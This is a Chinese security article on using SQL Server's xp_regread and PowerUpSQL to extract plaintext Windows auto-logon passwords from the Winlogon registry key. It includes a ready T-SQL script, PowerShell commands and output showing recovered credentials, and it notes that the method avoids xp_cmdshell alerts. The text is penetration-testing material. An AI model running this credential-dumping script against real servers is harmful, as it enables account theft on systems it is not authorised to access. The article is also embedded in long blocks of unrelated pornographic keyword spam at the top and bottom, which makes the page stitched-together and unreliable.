精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

通過SQL Server與PowerUpSQL獲取Windows自動登錄密碼

安全 數據安全
在本文中,我將演示如何使用PowerUpSQL通過SQL Server轉儲Windows自動登錄密碼。 我還將談一下例如xp_regread等其他方式存儲過程在滲透測試中利用方法。

[[184013]]

前言

在本文中,我將演示如何使用PowerUpSQL通過SQL Server轉儲Windows自動登錄密碼。 我還將談一下例如xp_regread等其他方式存儲過程在滲透測試中利用方法。

xp_regread的簡短歷史

自SQL Server 2000以來,xp_regread擴展存儲過程一直存在。自從SQL Server 2000允許Public角色的成員訪問SQL Server服務帳戶中任何有權限的東西。 當時,它有一個非常大的影響,因為常見的SQL Server作為LocalSystem運行。

自從SQL Server 2000 SP4發布以來,xp_regread的影響已經相當小,由于添加了一些訪問控制,防止低特權登錄的用戶去訪問注冊表敏感的位置。 現在,無權限用戶只可訪問與SQL Server相關的注冊表位置。 有關這些的列表,請訪問https://support.microsoft.com/en-us/kb/887165

以下是一些更有趣的訪問路徑:

  1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Microsoft SQL Server \  
  2. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ MSSQLServer  
  3. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Search  
  4. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ SQLServer  
  5. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows消息子系統  
  6. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ EventLog \ Application \ SQLServer  
  7. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ SNMP \ Parameters \ ExtensionAgents  
  8. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ SQLServer  
  9. HKEY_CURRENT_USER \ Software \ Microsoft \ Mail HKEY_CURRENT_USER \ Control Panel \ International 

具有 Public權限的xp_regread的實際用途

xp_regread可以用來獲取很多有用的信息。 事實上,當作為最低權限登錄時,我們可以使用它來獲取無法在通過其他方式而獲得的服務器信息。 例如,PowerUpSQL中的Get-SQLServerInfo函數可以得到一些信息。

  1. PS C:\> Get-SQLServerInfo 
  2. ComputerName           : SQLServer1 
  3. Instance               : SQLServer1 
  4. DomainName             : demo.local 
  5. ServiceName            : MSSQLSERVER 
  6. ServiceAccount         : NT Service\MSSQLSERVER 
  7. AuthenticationMode     : Windows and SQL Server Authentication 
  8. Clustered              : No 
  9. SQLServerVersionNumber : 12.0.4213.0 
  10. SQLServerMajorVersion  : 2014 
  11. SQLServerEdition       : Developer Edition (64-bit) 
  12. SQLServerServicePack   : SP1 
  13. OSArchitecture         : X64 
  14. OsMachineType          : WinNT 
  15. OSVersionName          : Windows 8.1 Pro 
  16. OsVersionNumber        : 6.3 
  17. Currentlogin           : demo\user 
  18. IsSysadmin             : Yes 
  19. ActiveSessions         : 3 

在SQL Server SP4中實現的訪問控制限制不適用于sysadmins。 因此,SQL Server服務帳戶可以在注冊表中訪問的任何內容,sysadmin可以通過xp_regread訪問。

乍一看,這可能不是一個大問題,但它確實允許我們從注冊表中提取敏感數據,而無需啟用xp_cmdshell,當xp_cmdshell啟用和使用時可能會觸發大量警報。

使用xp_regread恢復Windows自動登錄憑據

可以將Windows配置為在計算機啟動時自動登錄。 雖然這不是企業環境中的常見配置,但這是我們在其他環境中經常看到的。 特別是那些支持傳統POS終端和Kiosk與本地運行SQL Server的。 在大多數情況下,當Windows配置為自動登錄時,未加密的憑據存儲在注冊表項中:

  1. HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 

利用該信息,我們可以編寫一個基本的TSQL腳本,該腳本使用xp_regread將自動登錄憑據從我們的注冊表中提取出來,而無需啟用xp_cmdshell。 下面是一個TSQL腳本示例,但由于注冊表路徑不在允許的列表中,我們必須將查詢作為sysadmin運行:

  1. ------------------------------------------------------------------------- 
  2. -- Get Windows Auto Login Credentials from the Registry 
  3. ------------------------------------------------------------------------- 
  4. -- Get AutoLogin Default Domain 
  5. DECLARE @AutoLoginDomain  SYSNAME 
  6. EXECUTE master.dbo.xp_regread 
  7. @rootkey        = N'HKEY_LOCAL_MACHINE'
  8. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  9. @value_name     = N'DefaultDomainName'
  10. @value          = @AutoLoginDomain output 
  11. -- Get AutoLogin DefaultUsername 
  12. DECLARE @AutoLoginUser  SYSNAME 
  13. EXECUTE master.dbo.xp_regread 
  14. @rootkey        = N'HKEY_LOCAL_MACHINE'
  15. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  16. @value_name     = N'DefaultUserName'
  17. @value          = @AutoLoginUser output 
  18. -- Get AutoLogin DefaultUsername 
  19. DECLARE @AutoLoginPassword  SYSNAME 
  20. EXECUTE master.dbo.xp_regread 
  21. @rootkey        = N'HKEY_LOCAL_MACHINE'
  22. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  23. @value_name     = N'DefaultPassword'
  24. @value          = @AutoLoginPassword output  
  25. -- Display Results 
  26. SELECT @AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword 

我還創建了一個名為“Get-SQLRecoverPwAutoLogon”的PowerUpSQL函數,所以你可以直接運行它。 它將獲取到默認Windows自動登錄信息和備用Windows自動登錄信息(如果已設置)。 然后它返回相關的域名,用戶名和密碼。

下面是命令示例。

  1. PS C:\> $Accessible = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 15| Where-Object {$_.Status –eq “Accessible”} 
  2. PS C:\> $Accessible | Get-SQLRecoverPwAutoLogon -Verbose 
  3. VERBOSE: SQLServer1.demo.local\Instance1 : Connection Success. 
  4. VERBOSE: SQLServer2.demo.local\Application : Connection Success. 
  5. VERBOSE: SQLServer2.demo.local\Application : This function requires sysadmin privileges. Done. 
  6. VERBOSE: SQLServer3.demo.local\2014 : Connection Success. 
  7. VERBOSE: SQLServer3.demo.local\2014 : This function requires sysadmin privileges. Done. 
  8. ComputerName : SQLServer1 
  9. Instance     : SQLServer1\Instance1 
  10. Domain       : demo.local 
  11. UserName     : KioskAdmin 
  12. Password     : test 
  13. ComputerName : SQLServer1 
  14. Instance     : SQLServer1\Instance1 
  15. Domain       : demo.local 
  16. UserName     : kioskuser 
  17. Password     : KioskUserPassword! 

結尾

即使xp_regread擴展存儲過程已被部分關閉,不過仍然有很多方法,可以證明在滲透測試期間十分有用。 希望你會與“Get-SQLServerInfo”,“Get-SQLRecoverPwAutoLogon”函數有更多樂趣。

責任編輯:趙寧寧 來源: 安全客
相關推薦

2016-10-09 20:08:58

2010-07-01 11:29:57

SQL Server實

2011-04-06 14:16:49

SQL Server自動備份

2010-07-02 14:52:21

SQL Server元

2016-06-27 09:37:35

2021-07-29 23:21:01

Windows 8Windows微軟

2009-08-13 16:28:07

windows2008密碼驗證

2011-04-22 15:00:22

SQLwin7登錄

2010-11-08 14:32:00

SQL Server登

2010-12-16 11:01:55

Windows Ser

2016-12-22 09:11:24

Windows 10Windows 8Windows 7

2010-07-19 14:24:15

SQL Server盤

2016-10-14 08:45:19

Windows 10隱藏密碼

2009-05-14 13:18:50

SQL Server代理任務微軟

2009-08-25 16:16:27

C#調用Windows

2010-04-27 09:48:09

2010-07-13 09:20:38

SQL Server

2010-07-07 13:58:25

SQL Server死

2010-06-23 09:23:56

SQL Server

2011-04-18 13:02:08

SQL Server SQL Server
點贊
收藏

51CTO技術棧公眾號

青青青视频在线免费观看| 成人短视频在线观看免费| 91麻豆精品在线| 色综合久久网| 日韩一区二区三| 免费在线看黄色片| 国产日本在线视频| 国产剧情一区在线| 亚洲18私人小影院| 日韩一区二区a片免费观看| 欧美激情啪啪| 黄色精品在线看| 中国成人亚色综合网站| 神马精品久久| 国产精品2024| 国产成+人+综合+亚洲欧洲| 欧美成人综合色| 国内精品久久久久久久影视简单| 精品日韩99亚洲| 国产高潮免费视频| 999福利在线视频| 最新日韩av在线| 欧美久久久久久| 91肉色超薄丝袜脚交一区二区| 亚洲激情另类| 久久99视频精品| 色哟哟一一国产精品| 美女网站一区| 日韩电视剧免费观看网站| 日本成人xxx| 秋霞国产精品| 色哦色哦哦色天天综合| 国产日韩欧美精品在线观看| 4438x成人网全国最大| 黄网站app在线观看| 91精品综合| 一本色道久久88综合亚洲精品ⅰ| 国产精品19p| 成人51免费| 欧美日韩一区三区四区| 免费黄色日本网站| 小h片在线观看| 亚洲va韩国va欧美va| 国产a级黄色大片| 国产欧美黑人| 亚洲人成人一区二区在线观看 | www.国产在线视频| 国产秀色在线www免费观看| 欧美激情一区二区三区全黄| 欧美黄色直播| 免费a级毛片在线观看| 91蜜桃婷婷狠狠久久综合9色| 国内精品视频免费| 天堂中文在线资源| 97久久超碰国产精品| 国产精品久久精品视| 免费国产羞羞网站视频| 成人免费毛片app| 精品在线一区| 欧美一区二区少妇| 欧美国产日韩亚洲一区| 亚洲午夜精品一区二区| 国产黄a三级三级三级av在线看 | 亚洲香蕉伊综合在人在线视看| 免费黄色在线视频| 欧美日韩在线二区| 久久精品99久久香蕉国产色戒| 娇小11一12╳yⅹ╳毛片| 四季av在线一区二区三区| 成人免费高清视频| 日韩一级大片在线观看| 国产毛片久久久久久| 天堂久久av| 亚洲精品久久久久久久久久久久| 欧美性xxxx图片| av资源久久| xvideos亚洲人网站| 男女羞羞免费视频| 一本久道久久久| 国产精品黄视频| 国产绿帽刺激高潮对白| 成人免费看的视频| 日产精品久久久一区二区| 理论视频在线| 日韩美女啊v在线免费观看| 精品人妻人人做人人爽| 中文字幕在线直播| 欧美精品自拍偷拍| 奇米777第四色| jizzjizz欧美69巨大| 欧美久久精品午夜青青大伊人| 日本网站在线播放| 七七婷婷婷婷精品国产| 成人综合av网| 成人性生交大片免费看午夜| 亚洲精选在线视频| 午夜精品久久久内射近拍高清| 伊人亚洲精品| 亚洲精品中文字幕有码专区| 日本精品在线免费观看| 国产日韩欧美三区| 亚洲伊人一本大道中文字幕| 日韩av成人| 亚洲精品videosex极品| 人妻无码视频一区二区三区| 91成人精品在线| 中文字幕免费精品一区高清| 亚洲高清影视| 国产网站在线| 在线黄色网页| 好看的av在线不卡观看| 热草久综合在线| 国产视频一区二区三| 久久影视一区二区| 午夜在线视频免费观看| 日韩成人影音| 亚洲国产成人久久综合| 一区二区三区影视| 三级亚洲高清视频| 国产乱码精品一区二区三区中文 | 国产日韩一区二区在线| 日本高清精品| 日韩在线精品视频| 老熟妇仑乱一区二区av| 成人小视频免费观看| 中文字幕一区二区中文字幕 | 日本道免费精品一区二区三区| wwwxxx色| 欧美一区不卡| 成人妇女淫片aaaa视频| 国产98在线| 日韩欧美在线播放| 丰满大乳奶做爰ⅹxx视频| 国产精品黄色| 97人人澡人人爽| 成人看av片| 欧美精品亚洲一区二区在线播放| 国产精品久久久久久久av| 亚洲在线播放| 久久96国产精品久久99软件| 美女91在线| 欧美成人激情免费网| 欧美三级小视频| 国产精品 欧美精品| 神马影院我不卡| 亚洲成人av观看| 夜夜嗨av一区二区三区四区| 久久99国产综合精品免费| 99久久99久久精品国产片果冻| 97在线国产视频| 国产综合视频一区二区三区免费| 国产精品2023| 中文字幕亚洲无线码a| 久久人人爽人人爽人人片av免费| 久久网这里都是精品| 午夜精品久久久久久久无码| 日韩大胆成人| 日韩av三级在线观看| 啊v在线视频| 欧美色图免费看| 中国毛片直接看| 国产精品77777| 欧美又粗又长又爽做受| 国产三级精品三级在线观看国产| 98精品国产高清在线xxxx天堂| 四虎在线观看| 欧美在线视频你懂得| 日本 欧美 国产| 国产成人精品网址| 成人一对一视频| 国内精品久久久久久99蜜桃| 成人精品视频在线| 黄页在线观看免费| 亚洲伦理中文字幕| 怡红院成永久免费人全部视频| 日韩美女啊v在线免费观看| 在线播放av网址| 欧美一区=区| 亚洲精品9999| 综合欧美亚洲| 日本高清+成人网在线观看| 最新电影电视剧在线观看免费观看| 在线播放日韩导航| 日韩高清精品免费观看| 国产亚洲综合性久久久影院| 蜜臀一区二区三区精品免费视频 | 亚洲视频在线观看一区二区三区| 99久久精品费精品国产风间由美| 成人午夜影院在线观看| 美女一区网站| www亚洲欧美| 天堂中文资源在线| 日韩一区二区视频在线观看| 国产日产精品一区二区三区| 日韩毛片高清在线播放| 日本护士做爰视频| 久久av老司机精品网站导航| 亚洲аv电影天堂网| 91小视频网站| 亚洲精品社区| 中文字幕超清在线免费观看| 亚洲97av| 国产a一区二区| 四虎精品永久免费| 欧洲亚洲免费在线| 1区2区3区在线视频| 亚洲欧美精品一区| 亚洲第一精品网站| 色香蕉成人二区免费| 久久久久久久久97| 国产精品三级久久久久三级| 特大黑人巨人吊xxxx| 国产激情一区二区三区| 日本在线观看a| 亚洲精品韩国| 精品人妻大屁股白浆无码| 精品一区二区三区中文字幕老牛| 国产美女精品在线观看| 香蕉久久久久久| 国产精品成人观看视频国产奇米| 182在线播放| 久久精品在线播放| 天堂中文8资源在线8| 亚洲免费一级电影| 亚洲aⅴ乱码精品成人区| 日韩欧美资源站| 一区二区三区精彩视频| 色婷婷一区二区三区四区| 久久精品国产av一区二区三区| 亚洲欧洲在线观看av| 亚洲一二三四视频| 久久精品一区蜜桃臀影院| 日本japanese极品少妇| 成人手机电影网| 波多野结衣办公室双飞| 国产精品一二三在| 久久黄色一级视频| 国产很黄免费观看久久| 国产精品久久久久久久99| 国产综合一区二区| 在线观看免费av网址| 久久99精品国产.久久久久久| 国产主播中文字幕| 免费欧美日韩国产三级电影| 色婷婷狠狠18| 久久国产精品色| 黄色aaaaaa| 国产成a人无v码亚洲福利| 国产乱国产乱老熟300部视频| 国产一区二区女| 亚洲成人激情小说| 成人精品免费网站| 2018日韩中文字幕| 国产亚洲色婷婷久久99精品| 亚洲九九爱视频| 国产午夜免费视频| 激情亚洲一区二区三区四区| 欧美日韩综合在线观看| 欧美午夜激情在线| 最好看的日本字幕mv视频大全| 欧美亚一区二区| 国产精品人人爽| 亚洲成人av片| 久草在线免费福利资源| 视频在线一区二区| 影音先锋在线播放| 亚洲91精品在线观看| 精品国产免费人成网站| 国产精品欧美激情在线播放| 日韩毛片免费视频一级特黄| 91精品国产91久久久久青草| 精品福利网址导航| 日产国产精品精品a∨| 亚洲精品国产首次亮相| 亚洲精品久久久久久久蜜桃臀| 国产一区导航| 向日葵污视频在线观看| 国产精品一区二区久久精品爱涩| 国产一卡二卡三卡四卡| 久久嫩草精品久久久久| 污污视频网站在线免费观看| 亚洲永久免费av| 黄色网址中文字幕| 精品精品国产高清a毛片牛牛| 欧美亚洲日本| 久久成人在线视频| 乱人伦视频在线| 国产精品视频1区| youjizz亚洲| 日韩久久久久久久| 亚洲91中文字幕无线码三区| 国产成人永久免费视频| 丝袜美腿亚洲一区| 中文字幕人妻熟女在线| 国产日韩欧美激情| 国产主播在线观看| 欧美日本在线视频| 日韩电影免费| 欧美大片免费观看在线观看网站推荐| 网友自拍亚洲| 高清不卡日本v二区在线| 成人免费看片39| 色综合久久久久无码专区| 国产一区91精品张津瑜| 免费在线观看你懂的| 尤物视频一区二区| 成人黄色三级视频| 亚洲国产小视频在线观看| 伦xxxx在线| 国产精品久久久久久久久久久新郎 | 成人看片视频| 成人亚洲一区| 逼特逼视频在线| 高清国产一区二区| 国产免费美女视频| 色噜噜夜夜夜综合网| 人妻无码一区二区三区久久99| 久久精品视频中文字幕| 欧美va视频| 久久资源亚洲| 影音先锋亚洲电影| 妖精视频在线观看| 国产精品久久久久久福利一牛影视| 黄色在线视频网址| 亚洲国产精品福利| 国模私拍视频在线播放| 91视频国产一区| 三区四区不卡| 国产无套粉嫩白浆内谢的出处| av午夜精品一区二区三区| 欧美精品乱码视频一二专区| 制服丝袜日韩国产| 日本中文字幕伦在线观看| 国产精品极品在线| 国内成人精品| 中文字幕网av| 国产精品国产三级国产三级人妇| www.日韩一区| 在线观看久久av| 外国电影一区二区| 日韩精品资源| 老色鬼精品视频在线观看播放| 国产美女永久免费无遮挡| 欧美天堂亚洲电影院在线播放| 黄色片视频在线观看| 国产高清视频一区三区| 国内精品久久久久久99蜜桃| 国产主播中文字幕| 国产精品国产三级国产aⅴ原创| 18国产免费视频| 自拍视频国产精品| а天堂中文最新一区二区三区| 91社在线播放| 国产不卡在线播放| 久久精品www| 日韩电影中文 亚洲精品乱码| 超碰在线视屏| 欧美一区二区视频在线| 青青草国产成人av片免费| 99热这里只有精品4| 欧美草草影院在线视频| 黄色视屏在线免费观看| 欧美日韩高清免费| 麻豆91在线播放| 久久久精品国产sm调教| 国产视频精品一区二区三区| 不卡一二三区| 一区二区三区av在线| 国产精品一二二区| 妺妺窝人体色www在线下载| 日韩欧美国产一二三区| 羞羞电影在线观看www| 亚洲精品日韩激情在线电影| 欧美日韩亚洲国产精品| 加勒比精品视频| 欧美日韩一区成人| 欧美人体视频xxxxx| 久久综合九色99| 久久国内精品自在自线400部| 久久精品波多野结衣| 日韩极品精品视频免费观看| 国产精品麻豆成人av电影艾秋| 国产日韩欧美大片| 久久久久久久久久久黄色| 国产精品特级毛片一区二区三区| 久久久久亚洲精品国产| 精品国产91| 亚洲免费观看在线| 欧美专区亚洲专区| 国产乱码在线| 亚洲视频导航| 97久久精品人人爽人人爽蜜臀| 亚洲系列第一页| 97精品在线视频| 亚洲a在线视频| 一级片视频免费看| 精品国产乱码久久久久久老虎 | 午夜一级久久| 青青草成人免费| 在线成人中文字幕|